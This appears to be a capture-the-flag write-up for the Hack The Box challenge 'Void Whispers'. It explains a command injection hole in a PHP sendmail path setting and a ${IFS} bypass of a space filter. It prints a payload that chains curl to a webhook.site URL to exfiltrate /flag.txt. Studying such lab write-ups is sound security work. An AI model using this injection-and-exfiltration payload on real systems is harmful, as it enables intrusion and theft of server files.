# Void Whispers

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177226313/e31448bd-e94b-4159-b74e-ea8541341237.png align="center")

So Download the given files from the site and open the instance and Let’s check it out

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177264857/d422eb16-4d2a-4768-873c-b59ebc0585b9.png align="center")

Hmm The Site allows as to send mail through sendmail Path which looks kinda suspicious

Let’s check the downloaded files to see any vulnerability there

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177327958/cf141b72-0eff-443a-98f0-dc05ca32fd77.png align="center")

We Found It !!

The `updateSetting` endpoint ( `challenge/controllers/IndexController.php`) reads a user-controlled `sendMailPath` POST parameter and blindly interpolates it into a `shell_exec("which $sendMailPath")` call.

Because the application executes a shell command with unsanitized input, this results in **command injection vulnerability**. The developer attempted to block spaces with `preg_match('/\s/')` but this is insufficient — attackers can use `${IFS}` to inject whitespace and shell metacharacters (e.g. `;`) to chain commands.

So we will use this payload:

```apache
/usr/sbin/sendmail;curl${IFS}<WEBHOOK-UNIQUE-URL>?flag=$(cat${IFS}/flag.txt)
```

Now Let me tell you what is webhook and where u can get your own unique URL:

A **webhook** is simply an HTTP endpoint that accepts incoming requests (GET/POST/etc.) so one system can notify or send data to another.

And **webhook.site** is a public online tool that generates a **unique temporary URL** for you. When someone (or something) makes an HTTP request to that URL, webhook.site records and displays the full request so you can inspect it.

To Obtain Your Unique URL go visit this site: [https://webhook.site](https://webhook.site) *(No need of sign up)*

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181094633/9efbe06f-850a-4d2c-a3d4-7d91dd33a1bf.png align="center")

Now you also can use **ngrock** as an alternative to webhook site

So Now Lets Enter Our Payload in the Sendmail PATH parameter.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181187447/86a2311c-f0d7-4582-bd62-66813037e587.png align="center")

So this payload `/usr/sbin/sendmail;curl${IFS}https://webhook.site/<id>?flag=$(cat${IFS}/flag.txt)` will cause the server to run `curl` and exfiltrate `/flag.txt` to my webhook.

Let’s Send this and see what we get

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181822396/2a560dde-56c0-4aac-8f5c-c924bab851bb.png align="center")

We got the message Config updated successfully!

Now Let’s check our webhook.site to see did we get the flag or not.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181874093/4d4f887f-6a5c-4a2c-9c9d-bc081d2af6c6.png align="center")

VIOLA !! We got the flag in Query Strings *(do enter the flag in flag format which is HTB{} as curly braces are missing in the flag)*

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181996070/5476b185-4227-4881-9b19-e8c3ac68342e.png align="center")

For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/)

**THANKS FOR READING !!!**